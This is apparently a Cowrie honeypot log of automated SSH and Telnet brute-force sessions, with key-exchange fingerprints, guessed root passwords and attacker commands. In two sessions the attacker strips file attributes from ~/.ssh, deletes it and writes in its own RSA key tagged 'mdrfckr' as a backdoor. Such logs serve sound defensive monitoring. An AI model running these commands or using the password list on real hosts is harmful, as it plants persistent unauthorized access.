{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:09.193423Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45204,"dst_ip":"1.2.3.4","dst_port":22,"session":"4411e31923b8","protocol":"ssh","message":"New connection: 212.227.235.229:45204 (1.2.3.4:22) [session: 4411e31923b8]","sensor":"my-vps","timestamp":"2025-09-08T22:18:10.824460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:10.825349Z","src_ip":"212.227.235.229","session":"4411e31923b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:11.131129Z","src_ip":"212.227.235.229","session":"4411e31923b8"}
{"eventid":"cowrie.login.success","username":"root","password":"Great","message":"login attempt [root/Great] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:18:11.495262Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:18:12.023087Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:18:12.023903Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:18:12.024968Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:12.277153Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.login.failed","username":"acer","password":"acer@2025","message":"login attempt [acer/acer@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:18:12.396738Z","src_ip":"212.227.235.229","session":"4411e31923b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:18:12.880386Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:18:12.881173Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:18:13.136193Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:13.137070Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34880,"dst_ip":"1.2.3.4","dst_port":22,"session":"db691f82b58a","protocol":"ssh","message":"New connection: 212.227.235.229:34880 (1.2.3.4:22) [session: db691f82b58a]","sensor":"my-vps","timestamp":"2025-09-08T22:18:13.383425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:13.384369Z","src_ip":"212.227.235.229","session":"db691f82b58a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:13.634284Z","src_ip":"212.227.235.229","session":"db691f82b58a"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:13.704271Z","src_ip":"212.227.235.229","session":"4411e31923b8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:18:16.096497Z","src_ip":"212.227.235.229","session":"db691f82b58a"}
{"eventid":"cowrie.session.closed","duration":12.624221086502075,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:16.777124Z","src_ip":"202.107.95.221","session":"c6d93f5389ca"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39548,"dst_ip":"1.2.3.4","dst_port":23,"session":"81dfd5d0aec7","protocol":"telnet","message":"New connection: 202.107.95.221:39548 (1.2.3.4:23) [session: 81dfd5d0aec7]","sensor":"my-vps","timestamp":"2025-09-08T22:18:16.927709Z"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:17.349392Z","src_ip":"212.227.235.229","session":"db691f82b58a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34894,"dst_ip":"1.2.3.4","dst_port":22,"session":"a97a10337ac6","protocol":"ssh","message":"New connection: 212.227.235.229:34894 (1.2.3.4:22) [session: a97a10337ac6]","sensor":"my-vps","timestamp":"2025-09-08T22:18:17.597080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:17.601294Z","src_ip":"212.227.235.229","session":"a97a10337ac6"}
{"eventid":"cowrie.session.closed","duration":13.439198732376099,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:17.736610Z","src_ip":"202.107.95.221","session":"31e49e26f269"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39557,"dst_ip":"1.2.3.4","dst_port":23,"session":"06b365cb8ecc","protocol":"telnet","message":"New connection: 202.107.95.221:39557 (1.2.3.4:23) [session: 06b365cb8ecc]","sensor":"my-vps","timestamp":"2025-09-08T22:18:18.042220Z"}
{"eventid":"cowrie.session.closed","duration":12.746225833892822,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:20.792406Z","src_ip":"202.107.95.221","session":"0dc921992ed6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:20.906543Z","src_ip":"212.227.235.229","session":"a97a10337ac6"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39594,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c1cd8b8f67f","protocol":"telnet","message":"New connection: 202.107.95.221:39594 (1.2.3.4:23) [session: 7c1cd8b8f67f]","sensor":"my-vps","timestamp":"2025-09-08T22:18:20.957624Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34276,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf092c7ddf26","protocol":"ssh","message":"New connection: 212.227.235.229:34276 (1.2.3.4:22) [session: bf092c7ddf26]","sensor":"my-vps","timestamp":"2025-09-08T22:18:21.289683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:21.303818Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:21.515305Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:18:21.661039Z","src_ip":"212.227.235.229","session":"a97a10337ac6"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:21.916064Z","src_ip":"212.227.235.229","session":"a97a10337ac6"}
{"eventid":"cowrie.session.closed","duration":"13.4","message":"Connection lost after 13.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:22.390018Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
{"eventid":"cowrie.login.success","username":"root","password":"Cc123456789","message":"login attempt [root/Cc123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:18:22.431589Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:18:22.894914Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:18:22.895595Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:18:22.896688Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:23.100481Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:18:23.527021Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:18:23.527965Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:18:23.735709Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:23.736902Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34280,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef55a3843e47","protocol":"ssh","message":"New connection: 212.227.235.229:34280 (1.2.3.4:22) [session: ef55a3843e47]","sensor":"my-vps","timestamp":"2025-09-08T22:18:23.939133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:23.939938Z","src_ip":"212.227.235.229","session":"ef55a3843e47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:24.143560Z","src_ip":"212.227.235.229","session":"ef55a3843e47"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:18:25.006080Z","src_ip":"212.227.235.229","session":"ef55a3843e47"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:26.231834Z","src_ip":"212.227.235.229","session":"ef55a3843e47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36532,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f29b40b77bc","protocol":"ssh","message":"New connection: 212.227.235.229:36532 (1.2.3.4:22) [session: 6f29b40b77bc]","sensor":"my-vps","timestamp":"2025-09-08T22:18:26.435338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:26.436223Z","src_ip":"212.227.235.229","session":"6f29b40b77bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:26.640070Z","src_ip":"212.227.235.229","session":"6f29b40b77bc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:18:27.497755Z","src_ip":"212.227.235.229","session":"6f29b40b77bc"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:27.703625Z","src_ip":"212.227.235.229","session":"bf092c7ddf26"}
